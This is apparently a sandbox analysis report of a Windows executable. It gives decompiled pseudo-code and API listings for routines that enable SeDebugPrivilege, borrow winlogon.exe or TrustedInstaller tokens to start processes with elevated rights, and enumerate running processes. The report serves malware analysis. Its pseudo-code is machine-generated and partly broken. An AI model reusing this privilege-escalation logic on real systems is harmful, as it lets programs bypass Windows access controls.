                                                                                                                			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                                                				char _v0;
                                                                                                                				WCHAR* _v4;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t76;
                                                                                                                				void* _t82;
                                                                                                                				wchar_t* _t85;
                                                                                                                				void* _t86;
                                                                                                                				void* _t87;
                                                                                                                				intOrPtr _t92;
                                                                                                                				wchar_t* _t93;
                                                                                                                				intOrPtr _t95;
                                                                                                                				int _t106;
                                                                                                                				char* _t110;
                                                                                                                				intOrPtr _t115;
                                                                                                                				wchar_t* _t117;
                                                                                                                				intOrPtr _t124;
                                                                                                                				wchar_t* _t125;
                                                                                                                				intOrPtr _t131;
                                                                                                                				wchar_t* _t132;
                                                                                                                				int _t156;
                                                                                                                				void* _t159;
                                                                                                                				intOrPtr _t162;
                                                                                                                				void* _t177;
                                                                                                                				void* _t178;
                                                                                                                				void* _t179;
                                                                                                                				intOrPtr _t181;
                                                                                                                				int _t187;
                                                                                                                				intOrPtr _t188;
                                                                                                                				intOrPtr _t190;
                                                                                                                				intOrPtr _t198;
                                                                                                                				signed int _t205;
                                                                                                                				signed int _t206;
                                                                                                                
                                                                                                                				_t179 = __edx;
                                                                                                                				_t158 = __ecx;
                                                                                                                				_t206 = _t205 & 0xfffffff8;
                                                                                                                				E0040B550(0x1ccc, __ecx);
                                                                                                                				_t76 = E0040313D(_t158);
                                                                                                                				if(_t76 != 0) {
                                                                                                                					E0040AC52();
                                                                                                                					SetErrorMode(0x8001); // executed
                                                                                                                					_t156 = 0;
                                                                                                                					 *0x40fa70 = 0x11223344;
                                                                                                                					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                                                					_t82 = E00405497( &_a8);
                                                                                                                					_a48 = 0x20;
                                                                                                                					_a40 = 0;
                                                                                                                					_a52 = 0;
                                                                                                                					_a44 = 0;
                                                                                                                					_a56 = 0;
                                                                                                                					E004056B5(_t158, __eflags, _t82, _a12);
                                                                                                                					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                                                					 *_t206 = L"/SpecialRun";
                                                                                                                					_t85 = E0040585C( &_v0);
                                                                                                                					__eflags = _t85;
                                                                                                                					if(_t85 != 0) {
                                                                                                                						L8:
                                                                                                                						_t86 = E0040585C( &_a8, L"/Run");
                                                                                                                						__eflags = _t86 - _t156;
                                                                                                                						if(_t86 < _t156) {
                                                                                                                							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                                                							__eflags = _t87 - _t156;
                                                                                                                							if(_t87 >= _t156) {
                                                                                                                								_t162 =  *0x40fa74; // 0x4101c8
                                                                                                                								_t41 = _t87 + 1; // 0x1
                                                                                                                								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                                                								_t115 =  *0x40fa74; // 0x4101c8
                                                                                                                								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                                                								__eflags = _t117;
                                                                                                                								if(_t117 == 0) {
                                                                                                                									_a92 = _t156;
                                                                                                                									memset( &_a94, _t156, 0x208);
                                                                                                                									_a620 = _t156;
                                                                                                                									memset( &_a622, _t156, 0x208);
                                                                                                                									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                                                									_t124 =  *0x40fa74; // 0x4101c8
                                                                                                                									_t125 = _t124 + 0x5504;
                                                                                                                									_v4 = _t125;
                                                                                                                									_t187 = wcslen(_t125);
                                                                                                                									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                                                									__eflags = _t187 + _t51 - 0x104;
                                                                                                                									if(_t187 + _t51 >= 0x104) {
                                                                                                                										_a620 = _t156;
                                                                                                                									} else {
                                                                                                                										E00404BE4( &_a620,  &_a92, _v4);
                                                                                                                									}
                                                                                                                									_t131 =  *0x40fa74; // 0x4101c8
                                                                                                                									_t132 = _t131 + 0x5504;
                                                                                                                									__eflags = _t132;
                                                                                                                									wcscpy(_t132,  &_a620);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							E00402F31(_t156);
                                                                                                                							_t181 =  *0x40fa74; // 0x4101c8
                                                                                                                							_pop(_t159);
                                                                                                                							_a84 =  &_a8;
                                                                                                                							_a76 = 0x40cb0c;
                                                                                                                							_a88 = _t156;
                                                                                                                							_a80 = _t156;
                                                                                                                							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                                                							_t92 =  *0x40fa74; // 0x4101c8
                                                                                                                							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                                                							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                                                								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                                                								__eflags = _t93;
                                                                                                                								if(_t93 < 0) {
                                                                                                                									E00406420();
                                                                                                                									__imp__CoInitialize(_t156);
                                                                                                                									_t95 =  *0x40fa74; // 0x4101c8
                                                                                                                									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                                                									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                                                									_t198 =  *0x40fa74; // 0x4101c8
                                                                                                                									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                                                									E00402F31(1);
                                                                                                                									__imp__CoUninitialize();
                                                                                                                								} else {
                                                                                                                									E004065BE(_t159);
                                                                                                                								}
                                                                                                                								goto L7;
                                                                                                                							} else {
                                                                                                                								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                                                								_a7356 = _t156;
                                                                                                                								_a7352 = _t156;
                                                                                                                								_a7340 = _t156;
                                                                                                                								_a7344 = _t156;
                                                                                                                								_a7348 = _t156;
                                                                                                                								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                                                								_t110 =  &_a5288;
                                                                                                                								L6:
                                                                                                                								E004035FB(_t110);
                                                                                                                								L7:
                                                                                                                								E004054B9( &_v0);
                                                                                                                								E004099D4( &_a32);
                                                                                                                								E004054B9( &_v0);
                                                                                                                								_t106 = _t156;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t26 = _t86 + 1; // 0x1
                                                                                                                						_t173 = _t26;
                                                                                                                						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							E00402F31(_t156);
                                                                                                                						} else {
                                                                                                                							E00402FC6(_t173, __eflags, _t138);
                                                                                                                						}
                                                                                                                						_t188 =  *0x40fa74; // 0x4101c8
                                                                                                                						_a68 =  &_a8;
                                                                                                                						_a60 = 0x40cb0c;
                                                                                                                						_a72 = _t156;
                                                                                                                						_a64 = _t156;
                                                                                                                						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                                                						_t190 =  *0x40fa74; // 0x4101c8
                                                                                                                						_a5280 = _t156;
                                                                                                                						_a5276 = _t156;
                                                                                                                						_a5264 = _t156;
                                                                                                                						_a5268 = _t156;
                                                                                                                						_a5272 = _t156;
                                                                                                                						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                                                						_t110 =  &_a3212;
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					__eflags = _a56 - 3;
                                                                                                                					if(_a56 != 3) {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					__eflags = 1;
                                                                                                                					_a3212 = 0;
                                                                                                                					_a3208 = 0;
                                                                                                                					_a3196 = 0;
                                                                                                                					_a3200 = 0;
                                                                                                                					_a3204 = 0;
                                                                                                                					_v4 = 0;
                                                                                                                					_v0 = 0;
                                                                                                                					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                                                					_t177 = 2;
                                                                                                                					_push(E0040584C( &_v0, _t177));
                                                                                                                					L0040B1F8();
                                                                                                                					_pop(_t178);
                                                                                                                					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
                                                                                                                					_t110 =  &_a1132;
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					_t106 = _t76 + 1;
                                                                                                                					L2:
                                                                                                                					return _t106;
                                                                                                                				}
                                                                                                                			}




































                                                                                                                0x004086e0
                                                                                                                0x004086f1
                                                                                                                0x004086f8
                                                                                                                0x004086ff
                                                                                                                0x00408706
                                                                                                                0x0040870d
                                                                                                                0x00408719
                                                                                                                0x0040871b
                                                                                                                0x00000000
                                                                                                                0x0040871b
                                                                                                                0x004085d5
                                                                                                                0x004085da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004085ec
                                                                                                                0x004085ef
                                                                                                                0x004085f6
                                                                                                                0x004085fd
                                                                                                                0x00408604
                                                                                                                0x0040860b
                                                                                                                0x00408612
                                                                                                                0x00408616
                                                                                                                0x00408620
                                                                                                                0x0040862a
                                                                                                                0x00408632
                                                                                                                0x00408633
                                                                                                                0x00408638
                                                                                                                0x0040864f
                                                                                                                0x00408651
                                                                                                                0x00000000
                                                                                                                0x0040854f
                                                                                                                0x0040854f
                                                                                                                0x00408550
                                                                                                                0x00408556
                                                                                                                0x00408556

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                  • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                  • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                  • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                • swscanf.MSVCRT ref: 00408620
                                                                                                                • _wtoi.MSVCRT ref: 00408633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                • API String ID: 3933224404-3784219877
                                                                                                                • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                                                				int _v8;
                                                                                                                				long _v12;
                                                                                                                				wchar_t* _v16;
                                                                                                                				void _v546;
                                                                                                                				long _v548;
                                                                                                                				void _v1074;
                                                                                                                				char _v1076;
                                                                                                                				void* __esi;
                                                                                                                				long _t84;
                                                                                                                				int _t87;
                                                                                                                				wchar_t* _t88;
                                                                                                                				int _t92;
                                                                                                                				void* _t93;
                                                                                                                				int _t94;
                                                                                                                				int _t96;
                                                                                                                				int _t99;
                                                                                                                				int _t104;
                                                                                                                				long _t105;
                                                                                                                				int _t110;
                                                                                                                				void** _t112;
                                                                                                                				int _t113;
                                                                                                                				intOrPtr _t131;
                                                                                                                				wchar_t* _t132;
                                                                                                                				int* _t148;
                                                                                                                				wchar_t* _t149;
                                                                                                                				int _t151;
                                                                                                                				void* _t152;
                                                                                                                				void* _t153;
                                                                                                                				int _t154;
                                                                                                                				void* _t155;
                                                                                                                				long _t160;
                                                                                                                
                                                                                                                				_t145 = __edx;
                                                                                                                				_t152 = __ecx;
                                                                                                                				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                                                				_v12 = 0;
                                                                                                                				if(_t131 != 4) {
                                                                                                                					__eflags = _t131 - 5;
                                                                                                                					if(_t131 != 5) {
                                                                                                                						__eflags = _t131 - 9;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							__eflags = _t131 - 8;
                                                                                                                							if(_t131 != 8) {
                                                                                                                								__eflags = _t131 - 6;
                                                                                                                								if(_t131 != 6) {
                                                                                                                									__eflags = _t131 - 7;
                                                                                                                									if(_t131 != 7) {
                                                                                                                										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                                                									} else {
                                                                                                                										_t132 = __eax + 0x46b6;
                                                                                                                										_t148 = __eax + 0x48b6;
                                                                                                                										__eflags =  *_t148;
                                                                                                                										_v16 = _t132;
                                                                                                                										_v8 = __eax + 0x4ab6;
                                                                                                                										if( *_t148 == 0) {
                                                                                                                											_t88 = wcschr(_t132, 0x40);
                                                                                                                											__eflags = _t88;
                                                                                                                											if(_t88 != 0) {
                                                                                                                												_t148 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										_t153 = _t152 + 0x800;
                                                                                                                										E0040289F(_t153);
                                                                                                                										_t154 =  *(_t153 + 0xc);
                                                                                                                										__eflags = _t154;
                                                                                                                										if(_t154 == 0) {
                                                                                                                											_t87 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                										} else {
                                                                                                                											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                										}
                                                                                                                										__eflags = _t87;
                                                                                                                									}
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t84 = GetLastError();
                                                                                                                										L43:
                                                                                                                										_v12 = _t84;
                                                                                                                									}
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                								__eflags = _t92;
                                                                                                                								if(_t92 != 0) {
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								_t84 = _a28;
                                                                                                                								goto L43;
                                                                                                                							}
                                                                                                                							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                                                							__eflags = _t93;
                                                                                                                							if(_t93 != 0) {
                                                                                                                								E00401306(_t93); // executed
                                                                                                                							}
                                                                                                                							_v8 = 0;
                                                                                                                							_t94 = E00401F04(_t145, _t152); // executed
                                                                                                                							__eflags = _t94;
                                                                                                                							_v12 = _t94;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                                                								__eflags = _t96;
                                                                                                                								_v12 = _t96;
                                                                                                                								if(_t96 == 0) {
                                                                                                                									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                									__eflags = _t99;
                                                                                                                									if(_t99 == 0) {
                                                                                                                										_v12 = GetLastError();
                                                                                                                									}
                                                                                                                									CloseHandle(_v8); // executed
                                                                                                                								}
                                                                                                                								RevertToSelf(); // executed
                                                                                                                							}
                                                                                                                							goto L44;
                                                                                                                						}
                                                                                                                						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                                                						__eflags = _t104;
                                                                                                                						if(_t104 == 0) {
                                                                                                                							goto L44;
                                                                                                                						}
                                                                                                                						_v8 = 0;
                                                                                                                						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					_t149 = __eax + 0x44ac;
                                                                                                                					_t110 = wcslen(_t149);
                                                                                                                					__eflags = _t110;
                                                                                                                					if(_t110 <= 0) {
                                                                                                                						goto L44;
                                                                                                                					} else {
                                                                                                                						_v8 = 0;
                                                                                                                						__eflags = E00404EA9(_t149, _t110);
                                                                                                                						_t112 =  &_v8;
                                                                                                                						_push(_t112);
                                                                                                                						_push(_t149);
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_push(_t152);
                                                                                                                							_t113 = E00401DF9(_t145, __eflags);
                                                                                                                						} else {
                                                                                                                							L0040B1F8();
                                                                                                                							_push(_t112);
                                                                                                                							_push(_t152);
                                                                                                                							_t113 = E00401E44();
                                                                                                                						}
                                                                                                                						_v12 = _t113;
                                                                                                                						__eflags = _t113;
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v548 = 0;
                                                                                                                					memset( &_v546, 0, 0x208);
                                                                                                                					_v1076 = 0;
                                                                                                                					memset( &_v1074, 0, 0x208);
                                                                                                                					E00404C3C( &_v548);
                                                                                                                					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                                                					_t151 = wcslen(??);
                                                                                                                					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                                                					_t159 = _t151 + _t10 - 0x104;
                                                                                                                					if(_t151 + _t10 >= 0x104) {
                                                                                                                						_v1076 = 0;
                                                                                                                					} else {
                                                                                                                						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                                                					}
                                                                                                                					_v8 = 0;
                                                                                                                					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                                                					L14:
                                                                                                                					_t160 = _t105;
                                                                                                                					_v12 = _t105;
                                                                                                                					L15:
                                                                                                                					if(_t160 == 0) {
                                                                                                                						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                                                							_v12 = GetLastError();
                                                                                                                						}
                                                                                                                						CloseHandle(_v8);
                                                                                                                					}
                                                                                                                					L44:
                                                                                                                					return _v12;
                                                                                                                				}
                                                                                                                			}



































                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040201D
                                                                                                                • memset.MSVCRT ref: 00402035
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00402050
                                                                                                                • wcslen.MSVCRT ref: 0040205F
                                                                                                                • wcslen.MSVCRT ref: 004020B4
                                                                                                                • _wtoi.MSVCRT ref: 004020D7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                  • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                  • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                  • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                  • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                  • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                • wcschr.MSVCRT ref: 00402259
                                                                                                                • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                • API String ID: 3201562063-2355939583
                                                                                                                • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				char _v16;
                                                                                                                				char _v24;
                                                                                                                				char _v32;
                                                                                                                				char _v40;
                                                                                                                				char _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				char _v576;
                                                                                                                				long _v580;
                                                                                                                				intOrPtr _v1112;
                                                                                                                				long _v1128;
                                                                                                                				void _v1132;
                                                                                                                				void* _v1136;
                                                                                                                				void _v1658;
                                                                                                                				char _v1660;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t41;
                                                                                                                				long _t49;
                                                                                                                				void* _t50;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				struct HINSTANCE__* _t68;
                                                                                                                				void* _t71;
                                                                                                                				void* _t83;
                                                                                                                				void* _t84;
                                                                                                                				void* _t85;
                                                                                                                
                                                                                                                				_t78 = _a4;
                                                                                                                				E004099D4(_a4 + 0x28);
                                                                                                                				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                				_v12 = _t41;
                                                                                                                				memset( &_v1132, 0, 0x228);
                                                                                                                				_t84 = _t83 + 0xc;
                                                                                                                				_v1136 = 0x22c;
                                                                                                                				Process32FirstW(_v12,  &_v1136); // executed
                                                                                                                				while(Process32NextW(_v12,  &_v1136) != 0) {
                                                                                                                					E004090AF( &_v580);
                                                                                                                					_t49 = _v1128;
                                                                                                                					_v580 = _t49;
                                                                                                                					_v52 = _v1112;
                                                                                                                					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                                                					_v8 = _t50;
                                                                                                                					if(_t50 != 0) {
                                                                                                                						L4:
                                                                                                                						_v1660 = 0;
                                                                                                                						memset( &_v1658, 0, 0x208);
                                                                                                                						_t85 = _t84 + 0xc;
                                                                                                                						E004098F9(_t78, _v8,  &_v1660);
                                                                                                                						if(_v1660 != 0) {
                                                                                                                							L10:
                                                                                                                							E0040920A( &_v576,  &_v1660);
                                                                                                                							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                                							_t84 = _t85 + 0x14;
                                                                                                                							CloseHandle(_v8);
                                                                                                                							_t78 = _a4;
                                                                                                                							L11:
                                                                                                                							E004099ED(_t78 + 0x28,  &_v580);
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_v16 = 0x104;
                                                                                                                						if( *0x41c8e0 == 0) {
                                                                                                                							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                							if(_t68 != 0) {
                                                                                                                								 *0x41c8e0 = 1;
                                                                                                                								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t66 =  *0x41c8e4;
                                                                                                                						if(_t66 != 0) {
                                                                                                                							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                                                					_v8 = _t71;
                                                                                                                					if(_t71 == 0) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				return CloseHandle(_v12);
                                                                                                                			}































                                                                                                                APIs
                                                                                                                  • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                • memset.MSVCRT ref: 0040962E
                                                                                                                • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                • memset.MSVCRT ref: 004096C6
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 239888749-1740548384
                                                                                                                • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
